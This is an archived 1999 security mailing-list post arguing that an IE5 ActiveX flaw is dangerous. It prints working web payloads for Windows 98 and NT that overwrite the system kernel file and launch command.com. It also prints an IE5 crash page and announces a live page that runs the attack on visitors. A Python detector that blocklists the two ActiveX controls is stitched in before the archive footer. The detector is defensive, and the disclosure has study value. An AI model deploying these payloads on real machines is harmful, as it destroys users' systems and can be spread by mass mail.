Re: IE5 allows executing programs

From: SysAdmin (SysAdminat_private)
Date: Mon Aug 30 1999 - 18:16:23 PDT


    After further research into David LeBlanc's debunking of my posting I have
    discovered (rather, remembered) that ntoskrnl is loaded from the system
    folder into memory, where it is accessed exclusively; this frees it from the
    write restriction due to system use. I think he must administrate Windows 98
    domains, which do not let you modify the Kernel (called Krnl386.exe). I'm
    sorry I have taken so long to respond to the criticism, but I felt that I,
    unlike others, should do my research first. Let me summarize the current
    understanding:
    
    ANY Windows 98 file can be overwritten. Period. If you try to manually
    paste over or destroy the file you will be denied; however, ActiveX can
    help where you can't. In fact, ironically, after it's been corrupted you
    cannot fix it because you are denied from touching it! If Windows 98 is
    restarted or crashed (hint: forced to crash), then it will fail to start up
    with a Fatal Exception; you can only recover from DOS by restoring the file.
    I would like to note, for the record, that the vast majority of home users,
    who will never know about the patch to this file or know what ActiveX even
    is, are not in possession of 98 install disks. Rather, they are in possession
    of a disk that restores the computer to factory original. Despite David
    LeBlanc et al.'s assurance that we could just disable ActiveX, I'm discussing
    it because you know your poor parents are NEVER going to; how would they
    understand the instructions? And, of course, what average user could EVER
    recover from this sort of damage?
    
    On to Windows NT: yes, David was correct, you can bar write access in NTFS
    and it cannot be written to. I have not invested any interest in this, but I
    assume there is at least one critical system file (possibly a security file)
    that he would miss and might be overwritten. In fact, the default for the
    Administrator, or one with Administrator privileges, is Full Access. Of course
    this would allow the exploit to run. The other thing to remember is that in
    very small domains the average user is generally administrator, and remember
    this exploit can be e-mailed!!! or mass-mailed! Get my drift? The other
    thing is that the default install for NT (especially on HPs) is FAT, which
    does not allow specific file security. Anyone know a dual-booter? Maybe
    someone who doesn't even know what NTFS is? I thought so.
    
    Well, I must admit I'm tired of the downplaying and guessing. I have
    decided to put the ball in play. I have posted a web page, on my domain mind
    you, that contains the hacks for both OSes. Understand that if you visit
    them the hack will run, and when it runs, if you're not prepared, you will be
    very unhappy. I have included the code here so that you can see what
    happens.
    
    
    The link is http://www.sassproductions.com/hacked.htm
    
    The code for the 98 exploit is:
    
    <p>
    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
    width="14" height="14"></object>
    <script>
    scr.Reset();
    scr.Path="C:\\windows\\system\\Krnl386.exe";
    scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>
    
    </p>
    
    See how simply that was adapted? I polished it not at all, so you can see the
    minimal changes. At this point you would be automatically transferred to a
    second web page that would contain the following code.
    
    <html>
    
    <head>
    <title>Self Destruct </title>
    </head>
    
    <body>
    <form method="POST">
    
    <table>
    <tr>
    <td width="20%"><input type="text" name="State" size="99999999"
    maxlength="99999999" value=""></td>
    </tr>
    </table>
    
    </form>
    </body>
    </html>
    
    Recognize that? It's the code to DoS IE5. Most simple users would restart at
    this point, never notice a web page change, and lose their Kernel.
    
    Here's the NT code:
    
    <p>
    <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
    width="14" height="14">
    </object>
    <script>
    scr.Reset();
    scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe";
    scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\command.com');</"+"SCRIPT>";
    scr.write();
    </script>
    </p>
    
    Not bad, huh? This exploit needs to be realized for what it is: a very
    dangerous problem. If someone mass-mailed it to my domain I wouldn't be able
    to deal with bouncing between three offices helping EVERY single user.
    
    If someone has a problem with my post feel free to mention it.
    
    Seth Georgion
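Since the post stresses that this payload can be mass-mailed, here is an added example (not part of Seth's post or any product) of a mail-gateway check that flags HTML bodies embedding the two ActiveX CLSIDs quoted above, tolerant of the line wrapping, quoting and case variations seen in the post. The sample bodies are constructed, and the blocklist, regexes and function names are assumptions of this example.

```python
import re

# CLSIDs quoted in the post above. Both controls are unsafe to expose to web script:
# Scriptlet.TypeLib writes arbitrary local files, WScript.Shell launches local programs.
BLOCKED_CLSIDS = {
    "06290BD5-48AA-11D2-8432-006008C3FBFC": "Scriptlet.TypeLib (arbitrary local file write)",
    "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell (runs local programs)",
}

# <object ...> tags, including ones split across lines by mail wrapping ([^>] matches newlines).
_OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
# classid="clsid:..." in any case, with either quote style or none, and optional whitespace.
_CLASSID = re.compile(r"classid\s*=\s*['\"]?\s*clsid:\s*([0-9A-Fa-f-]{36})", re.IGNORECASE)


def find_blocked_objects(html):
    """Return [(clsid, reason), ...] for every <object> tag whose CLSID is blocklisted.
    Tags nested inside script strings (as in the post's scr.Doc payload) are found too,
    because the scan runs over raw text rather than a parsed DOM."""
    hits = []
    for tag in _OBJECT_TAG.finditer(html):
        m = _CLASSID.search(tag.group(0))
        if m:
            clsid = m.group(1).upper()
            if clsid in BLOCKED_CLSIDS:
                hits.append((clsid, BLOCKED_CLSIDS[clsid]))
    return hits


def should_quarantine(html):
    """Gateway decision: hold the message if any blocked control is embedded."""
    return bool(find_blocked_objects(html))


# Constructed samples (not real mail). The all-zero CLSID is a placeholder for a harmless
# control; the second body mirrors the post's layout, with one control instantiated in the
# page and a second one nested inside a script string.
CLEAN_SAMPLE = """<html><body><p>Quarterly report attached.</p>
<object classid="clsid:00000000-0000-0000-0000-000000000000" width="1" height="1"></object>
</body></html>"""

SUSPECT_SAMPLE = """<p>
<object id="scr"
   classid='clsid:06290bd5-48aa-11d2-8432-006008c3fbfc' width="14"
height="14"
></object><script>
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>";
</script>
</p>"""

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(name, "quarantine" if should_quarantine(body) else "deliver", find_blocked_objects(body))
```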
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:00:39 PDT